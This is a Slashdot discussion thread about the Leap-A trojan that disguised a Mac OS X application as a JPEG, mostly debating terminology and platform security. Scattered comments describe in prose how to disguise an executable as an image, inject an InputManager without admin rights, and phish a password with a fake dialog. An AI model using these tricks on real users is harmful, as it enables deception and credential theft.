The trade off here is that with customizable icons, the applications (which are often executed from the dock or the finder) are more identifiable to users vs. the way kde does it. Under Mac OS X the user would only have the application name to find a file, which is far more difficult then identifing an icon of the application wanted. However kde uses a "launch" button much like windows so identifing an application (or executable script or whatnot) by icon is not needed.

Re:It's not a virus...

[mdwh2]

you missed the part about typing in an admin password. windows doesn't have that additional layer of security on it. You can unarchive and open it under any user account. It will infect the whole computer. with a mac, you can unarchive it and attempt to open it with any user account. but in the end, you can't actually open it without root access.

A password is an extra step, but it won't make a difference to most home users, compared with say all the "I LOVE YOU" Windows worms which people happily criticised Windows for, despite also needing user intervention. If a user is stupid or trusting enough to run a file he's been sent, then he'll happily type in his password to get what he wants.

any computer user should immediately suspect something when a jpg requires your system admin password (and I believe in this case it would require the sys admin username and password).

Any knowledgable computer user. Most people won't understand why sometimes a password is needed and sometimes it isn't. And a knowledgable computer user knows enough to be suspicious of files he receives anyway.

Re:It's not a virus...

[nicolas.kassis]

It's called "The User"

This hole has never been fixed. Simply because it dosen't want too.

Nic
-------
www.nickassis.net

Re:It's not a virus...

GP poster is incorrect by saying it is a graphics flaw...it is not a graphics flaw it is a malicious app masquerading as an image file, however when the same thing happens with Windows and VBScripts disguised as a pic of Anna Kournikova or something similar comes out so many still come out and say it's a Windows problem...and yes Windows home users have admin access all the time but not in a corporation. I have been on many an OSX box where I did not need an admin password to decompress a file and run what is contained in it. This may be due to the specific config of the box, but I do agree with GP that many do look at Windows and say it's a Windows problem while they say that Linux/OSX is not the problem, it's the user or the admin who configured the box or some other reason they can come up with to avoid claiming that their thing is better. The truth is that all OSes can be affected by this same concept of exploitation and to single out one vendor in cases like this is irresponsible. I do not claim OSX is the problem here, and GP appears to be trying to make this point but simply not saying it the right way, especially because of the incorrect assessment that it is a flaw in graphics processing. I might restate his/her post by saying that when this type of a trojan happens on a windows box many claim it to be a windows problem, but when it happens on some other os then that os is suddenly not the issue. The GP is not blaming OSX, rather making a point that OSX (or any other os) has this problem just as much as Windows does, but Windows gets the harder rap.

Re:It's not a virus...

[InsaneGeek]

I think when he says "double standard" he means that everybody jumped up and down about Kama Sutra worm, people here were calling for massive lawsuits, and that Microsoft must be legally required do something about this. When the Kama Sutra worm, also required someone to go and click and go through the motions just like this one. If a MS gets held to a one standard of it being their fault, than Apple should logically have the same fault. I'd venture a statement that neither are at fault, you just can't out program end user stupidity and for both it's stupidity that's at fault.

Re:It's not a virus...

[Steve+Cowan]

The folks who would be interested in screenshots of 10.5 are the kind of folks who know an archive of photos does not require an admin password.

I wanted to believe that too, until I saw the thread that this file was initially posted in.

Re:It's not a virus...

[diegocgteleline.es]

There is a double standard in slashdot - most of the latest windows "virus" warnings weren't really virus, but trojans that users needed to double click to make them work.

People is critizing Windows for not providing "security" measures against those files so I don't see why you wouldn't do the same for mac os x - when thousands of people are being infected by such things, even if there's not a security hole something is failing somewhere, and I'd argue that those thousands of users shouldn't need to take computing classes to have a secure system.

Re:It's not a virus...

[Steve+Cowan]

Is this a "security flaw"?

If you're signed in as an admin user you have full write access to the /Applications directory. As a result this executable, when launched, can infect your apps without requiring further interaction, when you are signed in as an administrator.

Re:It's not a virus...

[the_wesman]

I hate to nitpick your work, but step #2 should not be in your list. Why? I've never double-clicked on a tgz file (or a zip, or an gz or whatever) on a mac because the file opens automagically in stuffit expander when you download it. So, the average out-of-the-box mac user will download it and just double-click on the 'image' that comes out. I feel that you added this step to give the impression that the user has this virtual scavenger hunt of tasks to perform when, in fact, there are only two actions. Furthermore, the actions are closely related. Who _doesn't_ open a file after downloading it? So, you are correct that there are multiple steps, but they're common steps that almost anyone (yourself included) is likely to perform.

Additionally, I read your comments posted on the bulletin board to which you linked (the relevant ones are copied below). You make one comment that says that the virus doesn't propogate, and then another that says it tries to propogate. Am I missing some subtle distinction here? You use the phrase "self-propogate' - how else would it propogate? _it_ issues some command to spread itself. The user is certainly not going to burn it to CD and hand it out to his friends. Even propagation through a third party utility (in this case, iChat) that is instigated by the file-which-is-to-be-propagated fits the definition of self-propagation. What are you getting at with these items?

-- This should probably be classified as a Trojan, not a virus, because it doesn't self-propagate externally
-- It doesn't actually do anything other than attempt to propagate itself via iChat

Re:It's not a virus...

[IamTheRealMike]

The flaw is that a file of one type is able to present itself as a file of another. This flaw was widely exploited in Windows a few years ago with the notorious "britney.jpg .vbs" type attacks, in which even though the icon was wrong (!!) people saw the file extension and opened it.

On Linux MIME scanning is used to make this type of attack significantly harder. A files icon is assigned by the operating system according to what type of file it actually appears to be, and executables cannot choose their own icons.

The fact that the virus then injects itself into other processes and takes control of them is nothing we haven't seen before on Windows.

I do not see in the Ambrosia writeup where the administrator password is required. If you aren't root it simply places the app hook in a different (but equally effective) location.

Re:It's not a virus...

[Kadin2048]

It's called "The User"

There are platforms which do not experience this flaw, however.

NeXTSTEP comes to mind....

(Apologies to anyone out there still using a Black Box.)

Re:It's not a virus...

[pubjames]

Good point. But is it really true that a Linux exe can't have its own icon? I thought they could... Or perhaps they can only once installed by the user? If so, then that makes a lot of sense.

Re:It's not a virus...

[Shanep]

you missed the part about typing in an admin password. windows doesn't have that additional layer of security on it.

I was thinking about this the other day. Can a program enter those details into those prompts or only a keyboard device? I assume there is something to stop someone from making a small application which prompts you for admin username and password (captures those details) and then uses them maliciously? It could be a small launcher type program which prompts you, you'd expect it to, it captures those details and then completes your install with them. Everything would look normal, except for the fact that your admin username and password have been captured. Is this possible in OSX?

Re:It's not a virus...

[m50d]

The security flaw is allowing applications to have icons that look exactly like system icons for things. At least it isn't exacerbated by hiding file extensions by default like on windows, but it's still a problem.

Yes, this is a user stupidity issue. However, so is 99% of the malware windows gets trashed for.

Re:It's not a virus...

[Seferino]

I agree that there is something of a double-standard. However, the big difference between most Windows trojan/virus scares and this specific trojan is that, in this case, the OS behaves exactly as it is expected to behave. By opposition, buffer overflow attacks are programming errors (which shouldn't exist in this day and age, but that's a different discussion). I did mention most Windows trojan/virus scares, not all, as this kind of trojan is quite feasible under Windows.

Now the question is : how do you make sure trojans can't happen ? I've seen a few potential "security measures" being discussed

1. somehow forcefully differenciate executables from everything else, either by modifying the icon or by changing the font
2. warn the user every time an executable is created/downloaded/extracted
3. warn the user every time an executable is executed, if this executable hasn't been installed by the administrator
4. don't let users have executable programs at all
5. proof-carrying code/checked executables
6. more sandboxing/dynamic authorisations for just about everything.

I'd say that proposition 1. has a fighting chance. Propositions 2., 3. and 4. will probably be quickly deactivated as "too clumsy". Proposition 5. would be great if engineers (not to mention "home" web developers) had the skills to actually get it to work. Too bad it's currently not cost-efficient to teach proofs to engineers, nor giving them the time to actually prove their programs. Proposition 6. might be the future, with Ajax-style apps and all that, but I'm afraid it requires too much education from the user.

Any other idea roaming around ?

Re:It's not a virus...

[Angostura]

The only OS X security flaw in this case, I think is the lack of a clear visual representation that the newly acquired file is an executable, irrespective of what the icon may attempt to show.

Hopefully Apple can fix this up fairly easily.

Re:It's not a virus...

You cannot be infected by this unless you do all of the following:

1) Are somehow sent (via email, iChat, etc.) or download the "latestpics.tgz" file

2) Double-click on the file to decompress it

3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

1, 2 and first half of 3 sounds like many of the biggest Windows problems out there.

Second half of 3 is wrong. If you are not running as root (and I'm guessing most OSX users are not) you will not be asked for a password, it will run as your UID and it can have access to wreck users programs and data. I've never understood why some people think not running as admin/root is some kind of panacea. It is my data and user environment I'm worried about.

Re:It's not a virus...

[Tenk101]

This just isn't true. If you have a jpeg with code embedded inside it, the OS just wont be able to decompress it into a screen image, this is exactly the same as any other operating system. There isn't anything about an image that can alter a stack frame as a result of decompression so you can't force an alternate path of execution.

Am I missing something here or is this just anti-windows FUD?

Re:It's not a virus...

[DieByWire]

3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

Is it true that if you're running under the admin account, you won't get the admin password prompt? Some in the thread you linked to say so.

Most private (not lab) Macs I've dealt with are running under the admin account most of the time, and getting someone to double-click on what they think is a picture would be a pretty easy - especially since Mac users are fairly confident about the safety of their machines, and consider images 'safe.'

It's not a virus, but if it's true that the admin account won't get a password prompt, I think this could trick quite a few people easily.

Right-click -> 'Open with Preview' from now on?

Re:It's not a virus...

[Coryoth]

Now the question is : how do you make sure trojans can't happen?

Well you could do something similar to what Linux DEs do and not let applications define a custom icon (unless they've been installed, and installed their icon on the system). The OS assigns all icons based on MIME type, and applications don't get choose their own icon.

You could also have better least privilege sandboxing available. It's not foolproof, plenty people will still click through a warning about the application trying to access your addressbook and network and give it suitable rights to run, but it will give some people pause. Some sort of system of Mandatory Access Controls as in SELinux would be suitable. All it really needs is other applications to respect such a security configuration, and a nice user interface put on the whole thing (so that it mostly warns a user about disallowed access attempts, with a prompt asking if they want to update security to allow it in future, and a simple system for programs to request specific access rights on install).

Sure neither of those options are completely bullet proof - nothing is in the face of true human stupidity. On the other hand either or both of those would offer a very significant improvement in security and roustness against such trojns and viruses than MacOSX currently offers.

Jedidiah.

Re:It's not a virus...

[Coryoth]

But is it really true that a Linux exe can't have its own icon? I thought they could... Or perhaps they can only once installed by the user?

When an application installs it can put an icon in the appropriate place on the system, and add appropriate entries such that the application menu entry and window decorations appear using that icon. The actual executable file itself can't change its icon. Go to "/usr/bin" on a Linux system in the file manager and scroll through - even your standard programs that all have nice icons in the menu have standard "executable" icons based on their MIME type.

Jedidiah.

Re:It's not a virus...

[DaggertipX]

I do not know the specifics as I don't run windows any longer, and didn't bother looking into it...
HOWEVER - There was recently a remote execution exploit to the windows image rendering code. So yes, viewing an image on a Windows machine that is unpatched can be dangerous.
Perhaps one of our windows using friends out there can provide more details if you need it...

Re:It's not a virus...

[Overly+Critical+Guy]

Precisely.

1.) This isn't the "first OS X virus." Several other proof-of-concept attempts have been written over the users, notably MP3Concept.

2.) This doesn't quality as a virus, it's more of a trojan.

3.) The fact it prompts for your password immediately renders it useless and ineffective as a trojan. I could write an AppleScript that deleted all of your system files but required your password to be entered for it to run--that doesn't mean I've written the "first OS X virus." It just means I've written a goofy program that relies on stupidity, which would be the same as any other password-based system in the world and not an OS flaw.

I was expecting a bunch of rampant Apple-bashing in the comments here, but it seems a lot of people are recognizing that this is non-news. Another password-required proof-of-concept that doesn't really do anything.

Re:It's not a virus...

The Karma Sutra worm and this silly non-story are two completely different things. Folks, THIS OS X "VIRUS" IS NOT AN IMAGE FILE. It is just an application with a jpg icon. If Apple has any fault in this it is a design fault with not somehow specifically distinguishing icons for executables as separate from others (think shortcut arrow in Windows land). There is no fault in OS X's security or with how jpg files are viewed.

In the case of the Karma Sutra worm there was a definite design flaw being exploited. The worm WAS IN AN IMAGE FILE. Not in an executable with a misleading icon. The WMF standard was written specifically to allow for executable code to be stored within the image file, and someone finally decided to exploit that.

Do you see the difference?

Karma Sutra == Actual image file that has no business executing code.

OS X "Virus" == An executable with a freaking jpg icon.

This is not a virus. This is not a worm. This is really a pathetic attempt at a Trojan by a 14 year old.

Re:It's not a virus...

[Overly+Critical+Guy]

The flaw is that a file of one type is able to present itself as a file of another. This flaw was widely exploited in Windows a few years ago with the notorious "britney.jpg .vbs" type attacks, in which even though the icon was wrong (!!) people saw the file extension and opened it.

I think people are misunderstanding how OS X handles file type icons. The file isn't presenting itself as a file of another type. If you did a Get Info, it would still say Application. On OS X, you can copy and paste any icon into file in the Get Info window. I have cool Mario icons for my various external USB drives. Someone just copied and pasted the JPEG icon in this case.

The fact that clicking this thing prompts for a password means OS X is correctly protecting you from this kind of an attack. Beyond that, anyone entering the password and enabling admin access for this program is at fault, not OS X.

Re:It's not a virus...

[Overly+Critical+Guy]

People is critizing Windows for not providing "security" measures against those files so I don't see why you wouldn't do the same for mac os x

OS X gives a password prompt, so it IS providing security measures against these types of files (so to answer the headline, no, this isn't the "first OS X virus"), but Windows doesn't present a password prompt at all--viruses just silently run and hook themselves into the registry and other system files, hence the criticism. That's not a double-standard; it's justified criticism toward a dominant operating system that still runs the majority of its users in a full root access account in the year 2006.

Re:It's not a virus...

[Overly+Critical+Guy]

over the users

Whoops--over the years!

Re:It's not a virus...

[IamTheRealMike]

I think people are misunderstanding how OS X handles file type icons. The file isn't presenting itself as a file of another type. If you did a Get Info, it would still say Application.

I understand just fine what's going on here. The problem is that humans go by icon to determine file type, whereas the machine goes via some other mechanism. The fact that you can find out what the machine thinks it is via some other route isn't relevant - the same was true of Windows yet the exploit still worked on significant numbers of people. It's for this reason that Outlook refuses to let you open or save executable file types these days.

Re:It's not a virus...

[diegocgteleline.es]

Like you need root access to look for email adresses or hook up in the IM program to autosend itself via IM....

Re:It's not a virus...

[Overly+Critical+Guy]

1.) When you start to download this .tgz file in Safari, it warns you that it's an application and asks if you want to continue. Safari auto-scans all downloads that way.

2.) When you run this program, it brings up a password prompt to ask for your permission.

God, how much more does Apple have to do to tell you it's an executable and not a simple JPEG?

Re:It's not a virus...

God, you left out the biggest part which is that Safari tells you it's an application when you start the download of the .tgz (Safari scans every file you download and warns you about crap like this). this is a total non-start of a trojan/virus

i think this story was planted by someone at Symantec so they can sell copies of their useless Antivirus software. it makes me sick to my stomach that uninformed people will read these reports from "security researches" and believe OS X is now infected with something bad, when it's not...it's painful how uneducated the tech press is today when it comes to Mac security. They're totally against Macs, I swear.

Re:It's not a virus...

It will only extract if you downloaded it with Safari (or another browser that opens files after downloading) and have "Open Safe Files Automatically".

If it's sent to you via iChat, it won't decompress on it's own.

Re:It's not a virus...

[Thalagyrt]

Except, this virus doesn't require or even ask for an admin password. The initially created account, which most users use, has write rights to /Applications, and /Library, which is all the virus needs to install itself. You open the file, it executes a script, and writes itself into random applications as well as the Library directory.

Re:It's not a virus...

[ceoyoyo]

If this were a single file executable then it couldn't have it's own icon, it would be displayed with a default "command line tool" icon. It must be a .app bundle, which is really a directory, so it can't be sent to you in an executable form... it has to come via an archive. Which means that you have to decompress it, THEN run it. Safari (and possibly iChat and Mail) will warn you that you're decompressing an application.

All in all, quite a bit of security there to keep you from hurting yourself. Not to mention OS X makes it really easy to see what that thing actually is before you double click on it -- either switch to three pane view and you get the file type right there, or hit Apple I (or select Info from the menu) and there you are.

Re:It's not a virus...

[ceoyoyo]

No, it's not true. Macs don't have AN admin account, rather, any user can be given admin privileges. You need to enter your password to use them though. If you're a non-admin account then you'd have to enter the username and password for an admin account when asked.

Admin privileges are not the same thing as running as root.

Re:It's not a virus...

[javaxman]

true. OS X only adds the 'protection' of requiring Admin authentication, and that only happens in this case because the executable tries to modify admin-only file directories.

So add 4. run as Administrator constantly or always authenticate when prompted.

As has been pointed out very, very often, the first part of (4) is default behavior for Windows. Not so on OS X, so it's less of an issue.

Still, I don't want to use the system that's so user-unfriendly that it prevents you from running this type of program completely, how the heck would you ever install a new program?

Sadly I think the best we can do is try to make sure you know when you've downloaded an executable, and try to let you know before an executable attempts to modify system files... going any further could make your system very difficult to use indeed.

Re:It's not a virus...

[Arandir]

On Linux MIME scanning is used to make this type of attack significantly harder. A files icon is assigned by the operating system according to what type of file it actually appears to be, and executables cannot choose their own icons.

I don't know what Linux you are using, but that's not the way it works with any Linux I have ever used. The file icon gets assigned by the desktop and/or file manager, typically as the result of an included .desktop file in the case of packaged executables. Granted, the icon is not embedded in the file like it is in Windows or OSX, but neither is it significantly difficult to fool an unalert Linux/BSD/Unix user.

For example, I could distribute a .desktop file with the title of "sexypic.jpg", an executable field specifying bash and a -e command, and specifying the system jpg icon for its icon. Tada! A Linux executable masquerading as a jpg file, complete with jpg icon.

Re:It's not a virus...

[Arandir]

Clicking on the executable will also prompt you with the "you haven't run this application before" dialog.

Re:It's not a virus...

[mr+i+want+to+go+home]

I was actually quite pleased by the quick insight - the third post was "The download is a unix executable file which opens in Terminal but is disguised as a jpeg.".

Re:It's not a virus...

3.) The fact it prompts for your password immediately renders it useless and ineffective as a trojan. I could write an AppleScript that deleted all of your system files but required your password to be entered for it to run--that doesn't mean I've written the "first OS X virus." It just means I've written a goofy program that relies on stupidity, which would be the same as any other password-based system in the world and not an OS flaw.

First, actually it does not need to prompt for a password and if it does, it is buggy. Any program you run can copy a file to ~/Library/InputManagers and this InputManager will be loaded in every started program then. No need for admin rights.

Second, even if such a beast needs admin rights, that's easy. Just keep running in the background and wait for a nice opportunity to prompt the user. Wait for a system update run or some app installation. 99% of all users will happily provide a password on such occasion, without thinking twice.

Face it, OS X is full of features just waiting to be exploited. Even without exploiting bugs, just trick the user into opening a file which is a disguised application and you can do almost anything if you know your target group.

Re:It's not a virus...

[njyoder]

Don't generalize about the "windows scenario." There are far more virus/trojans of the form .jpg.exe than actual jpegs that use a buffer overflow. This uses a simple and dumb wetware vulnerability that is extremely common for windows viruses/trojans.

Re:It's not a virus...

[njyoder]

1) Are somehow sent (via email, iChat, etc.) or download the "latestpics.tgz" file

This is automated by the virus/worm itself.

3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

Nope, it doesn't need admin privileges to spread. Besides, how is this different from most windows viruses/worms?

Re:It's not a virus...

[NutscrapeSucks]

A files icon is assigned by the operating system according to what type of file it actually appears to be

So, what you're saying is that it's impossible for applications to have custom icons in Linux shells? That would seem abnormal (relative to Mac and Windows).

Re:It's not a virus...

[Starxxon]

Clicking on the executable will also prompt you with the "you haven't run this application before" dialog.
No true in this case.

Hardware

[levik]

Well, of course there's a mac virus now - virus writers have been comfortably writing to the intel platform for years, and now with the processor switch, all the viruses will be very easy to port over :)

Re:Hardware

[creepynut]

Yeah. Which is why viruses on Linux are so rampant in the wild.

Re:Hardware

[iBod]

I don't think the underlying CPU architecture is much of an issue.

Most malware exploits flaws in the operating system and applications - not the hardware architecture.

I have heard this FUD from various Mac-heads (pissed at the change from PPC) that they are suddenly going to be swimming in malware due to a chip change. It's nonsense.

Re:Hardware

[JFlex]

A combination of many things, including and not limited to Windows' insecurity and poor programming are reasons why there are more viruses and malware for Windows.. not because of the processor architecture.

Re:Hardware

[Fahrvergnuugen]

This trojan is compiled as a PPC binary too.

Re:Hardware

[InfraredAD]

Hey genius, if you had a clue you'd see that the code is written for PowerPC. Good try though, why don't you go back to watching Teletubbies or something...

Re:Hardware

Linux users don't even enable cookies in the webbrowser. We don't fall for these lowly attempts to spread viruses and trojans. Mac users on the other hand can possibly be the best target possible. They have 100% thrust in everything related to their computers.

Re:Hardware

wooooosh!

Trojan?

[__aambat2633]

How can it be a virus if it is a Trojan?
You have to execute it yourself, and that is why it is _not_ a virus.

Re:Trojan?

[the_humeister]

Once the media gets a hold of a blanket term, we're stuck with it. Yes, it's technically a trojan. But nowadays malware that's not adware gets lumped into the virus category. Take a look at the term "hacker." "Cracker" would be the preferred term for a bad hacker, but the media still uses "hacker."

Re:Trojan?

[Emetophobe]

Also, it's masking itself as something that it is not, which would make it a trojan.

Re:Trojan?

[__aambat2633]

But slashdot is not the daily inquirer.

Re:Trojan?

How does it propagate itself? I thought the user had to download or receive it from someone else AND grant admin access. A virus would infect the machine with no help from the user -- this can't do that.

Re:Trojan?

[Psykus]

From what i've always been told, a trojan is just another type of virus. An automatically spreading virus that actually exploits flaws in the OS would be a worm, another type of virus.

Is there another definition of virus/trojan/worm that i'm not aware of?

Re:Trojan?

[dan+the+person]

From TFA: "According to the initial investigation, the application uses Spotlight to find the other applications on the infected machine and subsequently inserts a stub of code into each application executable."

So it infects other applications without user intervention.

Remember, the term virus was in use long before networked machines were common. Self propogation doesn't have to mean infecting applications on a different machine.

Re:Trojan?

[99BottlesOfBeerInMyF]

How can it be a virus if it is a Trojan?

OK, welcome to malware nomenclature 101. Will everyone please take their seats. Thank you. There are three basic classifications for malware:

• trojan - malicious application disguised as either a benign application or data.
• virus - a malicious application that copies itself into other locations infecting data or applications in an attempt to spread. Viruses often attempt to e-mail, IM, FTP, etc. themselves to other machines.
• worm - a worm is a virus that auto-propagates. That is to say it sends copies of itself automatically and traditionally without any user intervention.

This particular malware is a trojan (partly disguised as a jpg) which them copies itself to a new location on your drive and modifies a few commonly used applications in order to spread itself via they Bonjour discovery and file transfer mechanism in OS X. It requires human intervention to extract itself run, spread, and for download. I'd call this a virus to be clear about its functionality.

Re:Trojan?

I don't trust you, teacher, for you do not know it's named a Trojan horse.

Re:Trojan?

[MarkCollette]

How can it be a virus if it is a Trojan?
You have to execute it yourself, and that is why it is _not_ a virus.

Sure it is. Remember when the Greeks invaded Troy, and used a virus to infect a horse, to kill the aliens defending Troy?

Re:Trojan?

[vasko]

Well, it is a virus - just the Bosnian one:

You just received Bosnian virus. As we have no programming experience this virus works on the confidence principle. Please remove all files from your hard disk and manually forward this virus to everyone in your address book.

Thank you for your cooperation.

Bosnian


P.S. first send virus, then erase disk.

:)

Re:Trojan?

[godglike]

It seems to me that the common usage doesn't actually agree with your description. Technically you're correct but in everyday English "virus" seems to be used for any malicious application, whereas "worm" and "trojan" are specific varieties of virus.

So:
a virus is a worm or trojan.
a trojan is virus that tricks people into helping it.
a worm is a virus that works without user interaction.

Re:Trojan?

Welcome to the new frontier of Blended Threats.

This "exploit" uses Social Engineering to lure the victim to download & execute a Trojan that replicates & propagates itself like a Virus.

Not that sophisticated, but potentially mildly effective.

You want security...

Use windows vista. I heard it has zero viruses.

Re:You want security...

[Vo0k]

But it DOES have 0 viruses.
yet.

Re:You want security...

[Mistshadow2k4]

I highly doubt that. There are viruses that were made when Windows ME was new that will still affect an unprotected installation of Windows XP. In other words, since Microsoft did not fix some vulnerabilities for XP what makes you think they would for Vista?

Re:You want security...

[douglasq]

So much for backwards compatibility.

Had to happen really

[iBod]

But, I don't think OS X users have too much to worry about yet.

Might be good in a way - to shake some people out of the complacent "OS X is invulnerable" mindset.

Re:Had to happen really

[Sandor+at+the+Zoo]

The fact that this is news (actual Mac OS X malware!) is amazing.

What it tells us, I'm not sure. Depending on your viewpoint it's either Wow, Mac OS X is so secure that it took till now to have a virus! or Yeah yeah, Mac market share is so low that it took till now to have a virus.

:-) for the humor-impaired.

Re:Had to happen really

[WhiteWolf666]

No operating system is invulnerable versus administrator stupidity; and that's what anyone holding the admin password is.

User error can, and will, tank an operating system. The trick in OS design is making it difficult and obvious that they are about to do so.

Eh?

[TimeTrav]

Wouldn't shock me if it was written by a software company whose name rhymes with 'pedantic'.

Reminds me of old Applescript "hacks"

Back in high school we used to make little mean scripts in Applescript. Since there was no concept of security or multiple users in Mac OS 7 and 8, the script could do all sorts of nasty damage. All you had to do was compile/"save as" a standalone executable application from the Applescript Editor and paste an innocent icon on it. We liked to use the ClarisWorks icon to be extra mean.

Another variant was useful on computers that were proteted with OnGuard or AtEase. Simply make a script that would pop up a dialog box asking for the password. An unknowning teacher would enter the password and the script would exit... leaving behind a log file with the password in it for later use.

Nothing magical about these. Very basic trojan horses.

Re:Reminds me of old Applescript "hacks"

[tinkerghost]

Ahh the days of pasting hard drive icons on a shutdown link .... I remember them well :)

Re:Reminds me of old Applescript "hacks"

[Mistshadow2k4]

I remember reading somewhere that there had been about 500 such malware scripts in the wild that affected the Mac (no link, it's been a couple of years). I don't know if this is true or not, but if so, did Apple release patches to prevent them from affecting the Mac? Of course, as I understand it, these scripts wouldn't affect OSX because it's built over BSD anyway, but it's important to know if they will make a patch to protect against this one.

I'm glad this happned, but not in the anti-Apple way you might think. It proves one of my points I've posted before - that a system that requires a password to run such programs or otherwise modify the OS is much more secure. This trojan seems to have other effects though even without the password, judging from some of the posts here; kind of uncertain at this point. Fortunately for my business, it's quite apparent that Microsoft will never wise up in this regard.

Re:Reminds me of old Applescript "hacks"

[anaesthetica]

Or putting the Shut Down script in the Startup Items folder. That one got announced at assembly the next day ;)

Consider the source...

[k3vmo]

Come on. MacOSRumors.com on a forum post. Let's not loose our heads and start spreading FUD because of something someone's brother's first cousins next-door neighbor read in a forum post. If you're smart enough not to accept random files and put your admin password in for anything that pops up - this won't be much of an issue.

Re:Consider the source...

Let's not loose our heads

One of the few phrases where the "alternative" spelling of lose still works just fine.

Re:Consider the source...

[Psykus]

The same exact thing could be said for Windows security for the most part. There seems to be a double standard for OSX..

Re:Consider the source...

[blast3r]

Sophos posted an advisory as well.
http://www.sophos.com/virusinfo/analyses/osxleapa. html

Re:Consider the source...

[eheldreth]

Perhaps it's not somuch a double standard as a stament on the relitive inteligince of the standard Windows user.

Hehehe

[Ravenscall]

First, they dump the Power PC chip right before it is announced that they will be able to push it to 6 Ghz, then, they start getting viruses.

Where is your God now Mac users?

(Liked Macs when they still pushed performance over style)

Re:Hehehe

[jtalerico]

First, they dump the Power PC chip right before it is announced that they will be able to push it to 6 Ghz, then, they start getting viruses.

I agree with you on that, but RIGHT now the 6ghz is a Server chip.

It is not a virus, it is just a simple script. A idiot searching on google can figure out how to write a bash script.

Where is your God now Mac users?

There is a Mac God?
(Liked Macs when they still pushed performance over style)

Re:Hehehe

[iBod]

"Liked Macs when they still pushed performance over style"

When was that?

Apple have always put a premium on style and their performance per buck was always behind the curve - even since the original 68000 Macintosh. You had one because it was cool, not for blistering performance.

Re:Hehehe

[green+pizza]

"Liked Macs when they still pushed performance over style"

When was that?

Macintosh IIfx
Macintosh Quadra 900 and 950
Daystar quad PowerPC 604e Mac clone

Ugly and fast. Like a good muscle car.

Re:Hehehe

[Meostro]

There is a Mac God?

They've got one coming out in six months, it's called the iGod.

Re:Hehehe

[iBod]

Yeah, I see what you're saying GP but those were somewhat atypical Macs.

Even so, with exception of the Daystar clone, they were still reasonably stylish compared to the Wintel beige boxes.

Re:Hehehe

[iBod]

Is that a bit like Your Own Personal Jesus?

Re:Hehehe

[Jarlsberg]

There is a Mac God?

They've got one coming out in six months, it's called the iGod.

Nah, that's just the title of Steve Jobs upcoming self-biography.

Re:Hehehe

[Ravenscall]

Not true, in the early G3/G4 days, the PPC chip could knock the pants off of anything in the PC world for raw performance. That started slipping just before the G5 was introduce. Granted, they had been on the style kick ever since Jobs had returned, but there was more reason to get a Mac than just "shiny".

Now, that is the only reason to buy a Mac. It is computing for the style conscious and kids with ADHD. You will get a better machine rolling your own hardware and installing *nix.

Re:Hehehe

>>It is computing for the style conscious and kids with ADHD

I thought kids with ADHD all ran Linux!

Re:Hehehe

[mdarksbane]

I'd say it was more right around the end of the 604e. PowerPC's have almost always been faster than a pentium clock for clock, and for a while apple (and clones) had 300-350 mhz 604e's and 300 mhz G3's while the pentium was at 266-300. There was a significant speed difference.

I'd say they were at least somewhat ahead all the way from the transition to the PPC to when the first athlons came out. Until then, Intel hadn't had any real need to push the speed of their processors too much, and the Motorola and IBM chip devs had managed to stay ahead of them in most counts. Then suddenly the athlon came out, and x86 chips pushed to 1 ghz in almost no time, while at the same time motorola completely stalled on their G4 development (it was originally announced at 500 mhz, wasn't it? Then they couldn't actually make those, and it got dropped to 450 mhz, and it stayed at 450mhz for a long time.

I think that part of apple's whole transition to style over speed came from the fact that, through a situation over which they had little control, they suddenly had a processor that had been stuck at the same mhz for over a year with only marginal improvements in sight. They started running dual G4's in everything, which helped a lot (you think they would have done the extra cost of that, especially BEFORE they had a real multi-tasking OS, if they had a choice?) but still couldn't keep up with a good Athlon in most apps, which are still usually single-threaded and gain nothing from the second processor. Look at the benchmarks from that time period - it becomes very apparent that in general tests that actually use both processors, the dual G4 was about as fast as a good Pentium or Athlon. In the tests that didn't, it was about 2/3 as fast. In the few things that actually used Altivec (if you think it was all marketing hype, you've never tried to run DivX on an old G3 500. A single G4 400 handles it fine), they jumped way ahead.

What this actually translated to, if you were actually using the system instead of just benchmarking it, was that for big multitaskers, the G4 was as good of a workstation as the current PC's. For Apple apps, which all took advantage of Altivec, it was a screaming fast machine. For games, or people who only run one or two apps at a time, it probably sucked compared to their PC at home.

I guess what I'm meaning with all this is that at one time, right before Intel really figured out how to work around the old x86 architecture they've been dragging around for years and AMD suddenly gave them some real competition, Macs were faster than PC's. Since then they've been somewhat slower, but I don't think that's necessarily been a choice that Apple made as much as it was a very bad run of luck.

Re:Hehehe

[Mistshadow2k4]

Makes sense. After all, Mac users have been bragging for decades over how it was intelligently desinged....

Re:Hehehe

Oooo I hope they license the Flying Spaghetti Monster! Those other gods are so "Wintel".

Re:Hehehe

[dfghjk]

Sure, except at the time of the 604e the Pentium Pro had already been out a year. When the G3 was announced the Pentium II had already been in the market for 5-6 months.

Claiming that PowerPC's have almost always been faster than a pentium clock for clock is also not true. The original 601 and 603 were not. The 604 was faster than the Pentium but not the Pentium Pro at the time. The G3 and G4 not faster than the Pentium II and after. The G5 faster than the P4 but not the Pentium M or the AMD parts. Fact is the opposite is true but no matter. Macs have never had a demonstrable performance lead over PC's in the general case. Sure, DP G5's are faster than single processor PC's, G4 and G5 vector processing has mostly been superior, but as a general rule the basic computing performance of macs has always lagged.

Intel was pushed by AMD with the Athlon but they improved their products steadily before that. If anything, the rush to compete with AMD led to some quality issues with Intel, for example the withdrawn 1.1GHz Pentium III. Intel knew what they were doing before AMD. It was PowerPC that arguably did not.

Apple has always been about style. Performance, on the other hand, is a function of what their suppliers can provide. You can bet that Apple would make faster machines if they could and they frequently negotiate exclusives with suppliers of new technology so that the market will perceive that Apple is an innovator. Take the first DVD-R drives. Apple got an exclusive on the drive and branded it "Superdrive". Compaq got it one month later and the rest a month after that. Apple perpetuates the Superdrive name to this day.

How you can claim that the G4 is as good a workstation for heavy multitasking loads as current PC's is beyond me. It's overall performance lags considerable and task switches don't help matters any. If you want to claim that OS X is a better tasker than XP then go ahead (don't know that myself) but the G4 is archaic.

Re:Hehehe

There is a Mac God?
They've got one coming out in six months, it's called the iGod.

Nah, that's just the title of Steve Jobs upcoming self-biography.

A geek dies and goes to heaven. When he gets there, an angel asks him "Is there anything you'd like to see?"

"Yeah," says the geek. "I've always admired the pioneers of computer science, and would like to meet them." So the angel takes the geek around, and introduces him to Charles Babbage, Alan Turning, Jon von Neuman, etc.

